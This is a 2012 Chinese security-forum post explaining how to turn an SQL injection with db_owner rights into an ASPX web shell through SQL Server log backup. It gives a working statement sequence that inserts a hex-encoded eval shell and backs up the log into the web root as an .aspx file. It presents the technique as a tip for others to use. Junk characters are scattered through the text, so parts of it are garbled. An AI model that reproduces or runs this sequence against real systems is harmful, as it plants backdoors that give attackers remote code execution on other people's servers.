找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2048|回复: 0
打印 上一主题 下一主题

关于aspx环境下log备份的一些思考

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:57:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。7 P( a+ @* i6 d5 q6 e0 [8 l
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
7 o3 b7 W! M6 K, w# {: h( m经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
9 U) j% R& b$ K" ]+ C* x经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。$ v. x9 T0 b  X) f+ |  Y7 S# J1 ~

9 `$ _$ r2 I+ |! u& S& x! _--------------------------------------------------------------
4 i+ b5 J! u$ X8 t1 a7 h! [7 K今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
4 P: X. d3 B/ F/ H自己修改备份语句如下:4 W) T% r1 q9 U% R) z7 L, H2 C) D& v
Drop table cmd;--( O: g& {5 \: R6 ]: ?+ w3 _' Z9 K/ Z
alter database db_test set RECOVERY FULL;--  u3 p( R# ^" w' t1 X) b
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段/ \+ Y; z( z7 i( I7 H
backup log db_test to disk = 'c:\bak' with init;--
1 Z2 p/ {' e+ r* ^  V# m- l8 b  ^insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
; C6 W, X2 g' g7 u3 l5 E. adelete from cmd where id>1;--删除id>1的数据
- a; l0 }% ?/ H* v9 G" W' q8 Wbackup log db_test to disk = 'e:\webroot\test.aspx';--
, [! t$ N: s) V2 J  R+ {+ b  YDrop table cmd;--" y  e4 y0 L+ J: p( h( x, C+ [
希望对大家有用。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表